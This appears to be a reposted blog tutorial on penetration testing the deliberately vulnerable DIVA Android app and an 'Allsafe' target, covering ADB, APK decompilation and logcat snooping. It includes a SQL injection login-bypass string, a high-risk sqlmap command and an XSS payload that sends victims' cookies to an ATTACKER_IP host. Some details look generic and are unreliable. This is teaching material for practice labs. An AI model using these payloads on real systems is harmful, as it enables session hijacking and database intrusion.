Hacking Diva & Allsafe: A Deep Dive into Mobile and Web Penetration Testing + Video

Listen to this Post

Featured Image

Introduction:

In the ever-evolving landscape of cybersecurity, hands-on practice remains the cornerstone of skill development. A recent public walkthrough by Adam Ahmed, an Offensive Security Engineer, details the systematic compromise of two intentionally vulnerable applications: “Diva” (Android) and “Allsafe.” This article dissects the technical methodologies used in this engagement, providing a comprehensive guide for penetration testers looking to sharpen their skills in mobile application security and web exploitation.

Learning Objectives:

  • Understand the process of setting up an Android pentesting environment and decompiling APKs for static analysis.
  • Master the exploitation of common web vulnerabilities such as SQL Injection (SQLi) and Cross-Site Scripting (XSS) within the Allsafe challenge.
  • Learn to chain low-severity bugs to achieve a higher impact, simulating real-world adversarial tactics.

You Should Know:

1. Mobile Reconnaissance: Setting Up the Diva Lab

Before exploiting the Diva (Damn insecure and vulnerable App) application, we must prepare the battlefield. This involves setting up an Android Virtual Device (AVD) or a physical device in debugging mode and ensuring the necessary tools are installed on our attack machine (preferably Linux).

Step‑by‑step guide:

  1. Install ADB (Android Debug Bridge): On your Linux machine (e.g., Kali), install the Android tools.
    sudo apt update && sudo apt install adb -y
    
  2. Connect the Device: Connect your Android device/virtual machine via USB and enable USB debugging in Developer Options.
    adb devices
    

    Note: Ensure the device appears as “device” and not “unauthorized.”

  3. Install the Target App: Download the Diva APK and install it.
    adb install DivaApplication.apk
    
  4. Proxy Setup (Intercepting Traffic): To analyze the app’s network traffic, configure a Burp Suite proxy. On the Android device, set the Wi-Fi proxy to your host machine’s IP and port (e.g., 192.168.1.10:8080). Then, install the Burp CA certificate on the device to decrypt HTTPS traffic. This allows you to see the requests made by the app in real-time.

2. Static Analysis: Decompiling the APK

Static analysis involves inspecting the application’s source code without running it. This is crucial for finding hardcoded secrets or understanding logic flaws.

Step‑by‑step guide:

  1. Decompile with apktool: This extracts the app’s resources and AndroidManifest.xml.
    apktool d DivaApplication.apk
    
  2. Convert to Java with `jdax` or jadx-gui: For a more readable Java code view, use jadx. It generates Java source code from the APK.
    jadx-gui DivaApplication.apk
    
  3. Hunting for Secrets: In the `jadx-gui` output, search for keywords like “password”, “key”, “secret”, or “token”. In Diva, you will often find hardcoded credentials stored as plain strings in the source code. This mimics developers accidentally committing API keys to a public repository.
  4. Linux Command for String Extraction: You can also use basic Linux commands to quickly grep for strings.
    strings DivaApplication.apk | grep -i "password|api_key"
    

3. Dynamic Analysis: Exploiting Insecure Logging (Diva)

Diva often contains issues where sensitive information is printed to Android’s logging system (Logcat). An attacker with physical access or a malicious app with `READ_LOGS` permissions can steal this data.

Step‑by‑step guide:

  1. Launch the App: Open the Diva app on the device and navigate to the “Insecure Logging” section.
  2. Monitor Logcat: On your host machine, use ADB to monitor the device logs in real-time.
    adb logcat | grep -i "diva"
    
  3. Trigger the Function: Enter any text into the field (e.g., “test”) and click “Check”.
  4. Capture the Output: Review your terminal. You will likely see the entered text and potentially sensitive data printed by the developer for debugging. An attacker can view any data the developer left in these logs.

4. Web Exploitation: SQL Injection on Allsafe

The Allsafe web application (fictional from Mr. Robot) typically contains classic web vulnerabilities. Let’s simulate a SQL injection attack to bypass authentication.

Step‑by‑step guide:

  1. Navigate to Login: Access the Allsafe login page via your browser.
  2. Manual Injection Test: In the username field, enter a classic SQLi payload to manipulate the query logic:
    admin' OR '1'='1' -- -
    

    Enter any password. The `– -` comments out the rest of the original password check query.

3. Using SQLMap: For automated exploitation, use SQLMap.

sqlmap -u "http://target-ip/allsafe/login.php" --data="username=admin&password=test" --level=5 --risk=3 --dbs

Note: Replace `target-ip` with the actual IP address. This command tests the parameter for injection and attempts to enumerate databases.

5. Web Exploitation: Cross-Site Scripting (XSS) on Allsafe

XSS allows an attacker to inject malicious scripts into web pages viewed by other users.

Step‑by‑step guide:

  1. Find a Reflection Point: Look for a search bar or comment section within the Allsafe site.
  2. Inject a Test Payload: Enter a simple JavaScript alert to check for vulnerability.
    <script>alert('XSS')</script>
    
  3. Windows Command (Conceptual): While the attack happens in the browser, if we were to steal cookies, we would set up a listener on our attacking machine. On Windows, you might use `nc` (netcat) if installed via WSL or a tool like PowerCat. However, for a simple listener, we can use Python on Linux (WSL on Windows).
    On your attacking machine (Linux/WSL)
    python3 -m http.server 80
    
  4. Craft the Payload: Instead of an alert, we send the cookies to our listener.
    <script>document.location='http://ATTACKER_IP/steal.php?cookie='+document.cookie</script>
    

    If the site is vulnerable, the victim’s browser will send their session cookies to your server.

6. Hardening: Securing the Android Manifest

Based on the vulnerabilities found in Diva, we can apply hardening measures. A common issue is having the application debuggable in the release build.

Step‑by‑step guide:

  1. Check the Manifest: Look at the `AndroidManifest.xml` file extracted by apktool.
    <application android:allowBackup="true" android:debuggable="true" ... >
    

    The `android:debuggable=”true”` flag is a critical security risk for production apps.

  2. Remediation: Developers must ensure this flag is set to `false` in the build configuration for any release version. This prevents an attacker from attaching a debugger to the process and inspecting memory or bypassing client-side checks.

What Undercode Say:

  • Key Takeaway 1: Practice in a Sandbox. The walkthrough of Diva and Allsafe highlights the importance of isolated, legal environments for honing offensive security skills. Tools like adb, jadx, and `sqlmap` are the standard arsenal for any mobile or web app pentester.
  • Key Takeaway 2: The Power of Chaining. Adam’s documentation demonstrates that security assessments are rarely about a single “magic bullet.” It is a process of enumeration, static analysis, and dynamic testing. The value lies in methodically documenting each failure and success, turning a simple CTF into a professional learning asset.
  • Key Takeaway 3: Mindset over Tools. While the commands are crucial, the underlying mindset of questioning application behavior—”Why is this logging?”, “Can I break this SQL query?”—is what separates a script kiddie from a security engineer. The eWPTX and eMAPT certifications listed in his profile validate this structured, professional approach to both web and mobile penetration testing.

Prediction:

As mobile device management (MDM) and containerization become more prevalent, the attack surface will shift. We predict a rise in “hybrid” attacks where a mobile app vulnerability (like insecure storage in Diva) is used to harvest credentials, which are then used to pivot to a web application (like Allsafe). Future penetration tests will increasingly focus on the interconnectivity between mobile front-ends and cloud/web back-ends, moving beyond isolated testing to full-stack compromise scenarios. Walkthroughs like this will serve as the foundational blueprint for those complex, cross-platform attack chains.

▶️ Related Video (82% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Adam Ahmed – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky